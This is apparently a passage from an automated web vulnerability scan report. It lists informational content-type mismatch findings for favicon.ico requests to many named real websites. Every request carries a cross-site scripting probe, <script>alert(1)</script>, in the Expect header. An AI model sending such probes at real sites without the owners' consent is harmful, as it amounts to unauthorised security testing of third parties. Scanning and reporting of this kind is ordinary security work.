User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.startexpower.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:12:19 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.204. http://www.stratfordfestival.ca/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.stratfordfestival.ca
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.stratfordfestival.ca
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Expires: Fri, 15 Jul 2016 13:27:45 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:09:28 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.205. http://www.systweak.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.systweak.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.systweak.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:46:35 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.206. http://www.tabletpcreview.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tabletpcreview.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tabletpcreview.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:32:06 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.207. http://www.tbd.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tbd.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tbd.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 25 Apr 2011 21:28:06 GMT
ETag: "3880419-37e-4a1c4e21c2580"
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=300
Expires: Wed, 04 May 2011 03:37:27 GMT
Date: Wed, 04 May 2011 03:32:27 GMT
Content-Length: 894
Connection: close

..............h.......(....... ...........@....................s..m..i..g..g..i..k..n..o..o..o..o..p..r..s..u..n..f..`..]..].._..b..d..e..e..e..e..g..i..k..n..j..`..Y.yT.yT.|V.~X..Y..Z..Z..Z..[..\..^.
...[SNIP]...

31.208. http://www.thecompassstore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.thecompassstore.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thecompassstore.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:20:34 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.209. http://www.thefreeiqtest.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.thefreeiqtest.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thefreeiqtest.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Wed, 04 May 2011 01:52:26 GMT
Content-Type: text/plain
Connection: keep-alive
Last-Modified: Tue, 28 Dec 2010 15:33:48 GMT
ETag: "cfc0d3f-4486-4987a2dc28f00"
Content-Length: 17542
CF-Cache-Status: HIT
Expires: Wed, 04 May 2011 03:52:26 GMT
Cache-Control: public, max-age=7200
Accept-Ranges: bytes
Set-Cookie: __cfduid=d728dce90a0eb648333c9394c9cbf73651304473946; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.thefreeiqtest.org
Set-Cookie: __cfduid=d728dce90a0eb648333c9394c9cbf73651304473946; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.www.thefreeiqtest.org

......00.... ..%..F... .... ......%........ ..    ...6........ .h....@..(...0...`..... ......%............................................................................................................
...[SNIP]...

31.210. http://www.thegrocerygame.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.thegrocerygame.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thegrocerygame.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
ETag: ""
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 01:34:58 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.211. http://www.thegroveataltaridge.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.thegroveataltaridge.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thegroveataltaridge.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:21:13 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.212. http://www.theperfumespot.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.theperfumespot.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.theperfumespot.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:52:53 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.213. http://www.therapeuticresearch.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.therapeuticresearch.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.therapeuticresearch.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:23:12 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.214. http://www.thescooterstoreonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.thescooterstoreonline.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thescooterstoreonline.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:39:28 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.215. http://www.ticketseating.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ticketseating.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ticketseating.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:51:50 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.216. http://www.topoftheline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.topoftheline.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.topoftheline.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:38:52 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.217. http://www.tripplite.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tripplite.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tripplite.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:28:41 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.218. http://www.tsppilot.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tsppilot.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tsppilot.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:30:43 GMT
Server: Rapidsite/Apa/1.3.33 (Unix) FrontPage/5.0.2.2510 mod_ssl/2.8.22 OpenSSL/0.9.8d
Content-Type: text/html; charset=iso-8859-1
Content-Length: 20

HTTP Error Code 417"

31.219. http://www.tunewiki.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tunewiki.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tunewiki.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:11:08 GMT
Connection: close
Content-Length: 60
Set-Cookie: SERVERID=dayweb01; path=/

The page cannot be displayed because the expectation failed.

31.220. http://www.tv2.no/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tv2.no
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tv2.no
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
ETag: "378049-cbe-45d31192cf500"
Content-Type: text/plain; charset=UTF-8
Last-Modified: Thu, 04 Dec 2008 04:36:04 GMT
Keep-Alive: timeout=5, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.2.0 (U;max-age=1200+86400;age=0;ecid=144115561777483660,1)
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: Keep-Alive
Date: Wed, 04 May 2011 00:43:56 GMT
Age: 32
Content-Length: 3262

...... ..............(... ...@...............H...H.....................................................................................................................................................
...[SNIP]...

31.221. http://www.uniqlo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.uniqlo.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uniqlo.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 02 Apr 2009 02:46:48 GMT
ETag: "ec002-13e-7185f600"
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain
Date: Wed, 04 May 2011 03:38:29 GMT
Connection: close

..............(.......(....... .........................................................................................................................................................................
...[SNIP]...

31.222. http://www.utne.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.utne.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.utne.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:05:33 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.223. http://www.uwgb.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.uwgb.edu
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uwgb.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:47:28 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.224. http://www.vacuumpartstore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.vacuumpartstore.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vacuumpartstore.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:20:00 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.225. http://www.vegasview.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.vegasview.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vegasview.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: X-Mapping-bghfahco=8313510636CE875D636B546E4BA63827; path=/
Content-Length: 60
Date: Wed, 04 May 2011 00:47:34 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Type: text/html

The page cannot be displayed because the expectation failed.

31.226. http://www.viewmylisting.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.viewmylisting.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.viewmylisting.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:40:48 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.227. http://www.wackyplanet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wackyplanet.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wackyplanet.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:11:57 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.228. http://www.webcam-fun.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.webcam-fun.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webcam-fun.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:56:08 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.229. http://www.webgreeter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.webgreeter.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webgreeter.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:35:00 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.230. http://www.wellspan.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wellspan.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wellspan.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 03:26:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!--
    Build Date: 1/12/2011 1:52:51 PM
SiteMaker Release: SM7.1

Code created by:
Medseek, Inc.
2028 Village Lane
Solvang, CA. 93463
Phone 1-888 MEDSEEK
email info@medseek.com
htt
...[SNIP]...

31.231. http://www.wherethelocalseat.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wherethelocalseat.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wherethelocalseat.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: .ASPXANONYMOUS=qqqHu5dAzAEkAAAAMDAzNjI3YzYtYzEwYi00YTEyLWI4NzEtNDZkYjVlNDYyMjRi0MfJhH5wb3vYYSiD0z_8M-xEb3WvocFQ8HXYkLgBQpg1; expires=Tue, 12-Jul-2011 13:29:31 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:49:31 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.232. http://www.whosaliveandwhosdead.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.whosaliveandwhosdead.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.whosaliveandwhosdead.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:28:40 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.233. http://www.winsornewton.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.winsornewton.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.winsornewton.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Wed, 04 May 2011 01:02:17 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.234. http://www.winwithpaperless.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.winwithpaperless.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.winwithpaperless.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server:
Date: Wed, 04 May 2011 01:28:15 GMT
Connection: close
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.235. http://www.wirelessground.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wirelessground.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wirelessground.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:41:41 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.236. http://www.wizardworld.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wizardworld.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wizardworld.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:00:08 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.237. http://www.wjr.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wjr.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wjr.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:41:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NON DSP COR OTPa OUR IND OTC"
Content-Length: 67
Content-Type: text/html
Set-Cookie: SiteUserIsBot=0; path=/
Set-Cookie: ASPSESSIONIDASDCDCAR=JNDFDIEANCFGNJKMGINNPCLG; path=/
Cache-control: private
Set-Cookie: NSC_xKS=ffffffff09021e1d45525d5f4f58455e445a4a422215;expires=Wed, 04-May-2011 02:14:51 GMT;path=/

<br>Error, file not found: 404;http://www.wjr.com:5157/favicon.ico

31.238. http://www.worden.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.worden.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.worden.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:57:27 GMT
Content-Length: 60
Set-Cookie: BIGipServerworden.com=2852784650.20480.0000; path=/

The page cannot be displayed because the expectation failed.

31.239. http://www.worldsoffun.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.worldsoffun.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.worldsoffun.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
